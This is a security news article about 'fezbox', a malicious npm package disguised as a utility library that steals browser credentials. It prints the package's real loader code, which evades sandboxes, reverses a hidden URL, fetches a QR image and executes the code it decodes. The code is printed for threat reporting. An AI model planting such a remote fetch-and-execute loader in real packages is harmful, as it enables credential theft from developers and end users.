New Malware in npm Package Steals Browser Passwords Using Steganographic QR Code

A sophisticated malware campaign has emerged in the npm ecosystem, utilizing an innovative steganographic technique to conceal malicious code within QR codes.

The malicious package, identified as “fezbox,” presents itself as a legitimate JavaScript/TypeScript utility library while secretly executing password-stealing operations through a cleverly disguised QR code payload.

This attack represents a significant evolution in supply chain threats, demonstrating how cybercriminals are adopting increasingly creative methods to bypass security measures and evade detection systems.

The fezbox package masquerades as a comprehensive utility library offering TypeScript support, performance optimization, and modular functionality.

According to its documentation, the package provides common helper functions organized by feature modules, allowing developers to import only necessary components.

While the README file mentions a QR Code Module for generating and parsing QR codes, it deliberately omits crucial details about the package’s capability to fetch QR codes from remote URLs and execute embedded malicious code.

Socket.dev analysts identified the malware after detecting suspicious behavioral patterns within the package’s codebase.

The security team discovered multiple layers of obfuscation techniques, including string reversal, code minification, and the novel use of steganographic QR codes to hide the final payload.

At the time of discovery, the malicious package remained active on the npm registry, prompting Socket.dev to petition the npm security team for its immediate removal and the suspension of the threat actor’s account.

Advanced Steganographic Payload Delivery

The malware employs a sophisticated multi-stage execution process that begins with environmental checks and timing delays to evade sandbox detection.

The initial malicious code contains browser-specific conditionals that verify the presence of window and document objects, ensuring execution only occurs in legitimate browser environments.

When conditions are met, the malware waits 120 seconds before initiating the payload retrieval process.

The core malicious functionality revolves around a reversed URL string that conceals the location of the steganographic QR code:-

(function () {
    if (n.isDevelopment() || c.chance(2 / 3))
        return;
    setTimeout(async () => {
        const loader = new d.QRCodeScriptLoader();
        const t = await loader.parseQRCodeFromUrl(
            "gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yrani"
            .split("")
            .reverse()
            .join("")
        );
        loader.executeCode(t);
    }, 120 * 1e3);
})();

When reversed, this string resolves to a Cloudinary-hosted QR code image containing the final malicious payload. The QR code itself serves as a steganographic container, hiding JavaScript code that extracts username and password values from browser cookies.

Once decoded, the payload attempts to locate cookies containing authentication credentials, specifically searching for “username” and “password” fields using additional string obfuscation techniques.

The extracted credentials are then exfiltrated through an HTTPS POST request to a command-and-control server hosted on Railway, a cloud platform service.

This multi-layered approach – combining environmental evasion, timing delays, string reversal, steganographic concealment, and credential extraction – represents a sophisticated evolution in npm-based supply chain attacks that security teams must prepare to defend against.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.